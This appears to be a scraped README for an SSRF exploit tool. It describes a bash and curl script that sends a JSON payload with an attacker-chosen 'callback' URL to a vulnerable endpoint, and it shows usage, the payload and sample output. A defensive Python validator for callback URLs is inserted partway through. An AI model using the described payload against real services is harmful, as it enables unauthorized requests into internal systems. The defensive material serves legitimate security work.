## https://sploitus.com/exploit?id=D1821C57-9D8B-5E8D-92D8-1CF9328514A3
# SSRF Exploit Script
This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**
## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.
## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)
## Usage
### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```
### Options
| Option | Description |
|--------|-------------|
| `-h`, `--help` | Show the help menu. |
| `--exploit <tu> <pu>` | Perform the SSRF exploit with target and purview URLs. |
### Examples
#### Show Help Menu
```bash
./script.sh -h
```
Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```
#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```
Expected Output:
- If successful:
```
SSRF exploit successful! Data retrieved:
<response data>
```
- If unsuccessful:
```
SSRF exploit failed! HTTP code: <code>
```
## Script Workflow
1. The script parses the provided arguments.
2. It validates the provided URLs for correctness.
3. It sends an HTTP POST request to the `purview_url` with a JSON payload whose `callback` field is the `target_url`, attempting to exploit an SSRF vulnerability.
4. It prints the HTTP response or an error message based on the result.
## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```
### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```
### Response Handling
The script saves the HTTP response code and body, then uses the status code to decide whether the exploit succeeded or failed.
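On the receiving side, a service that accepts this payload should validate the `callback` field before making any outbound request. The following is an added example, not code from this repository; the allowlisted host `hooks.partner.example`, the function names and the injectable resolver are assumptions made for illustration.

```python
import ipaddress
import json
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the service may call back (assumption).
ALLOWED_HOSTS = {"hooks.partner.example"}

def system_resolver(host):
    """Return every address the system resolver gives for host."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_callback(body, resolver=system_resolver):
    """Return (ok, reason) for a JSON request body carrying a 'callback' URL."""
    try:
        url = json.loads(body)["callback"]
        if not isinstance(url, str):
            raise TypeError("callback must be a string")
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except (ValueError, KeyError, TypeError):
        return False, "malformed body or URL"
    if parts.scheme != "https":
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    if port not in (None, 443):
        return False, "port not allowed"
    try:
        addrs = resolver(host)
    except OSError:
        return False, "resolution failed"
    if not addrs:
        return False, "resolution failed"
    # Reject if ANY address is non-public (loopback, RFC 1918, link-local
    # metadata ranges); the fetch must then connect to a checked address.
    for addr in sorted(addrs):
        if not ipaddress.ip_address(addr).is_global:
            return False, f"resolves to non-public address {addr}"
    return True, "ok"

if __name__ == "__main__":
    # Constructed sample bodies and a stub resolver, so this runs offline.
    stub = lambda host: {"93.184.216.34"}
    for url in ("https://hooks.partner.example/notify", "http://callback-url.com"):
        print(url, check_callback(json.dumps({"callback": url}), stub))
```

The check only helps if the outbound request connects to one of the addresses that was validated and does not follow redirects; otherwise a second DNS lookup or a redirect can still reach an internal address.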
## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.
## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.
## Contribution
Feel free to contribute by creating pull requests or reporting issues.
## License
[GNU GPL v3](LICENSE)
---
### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.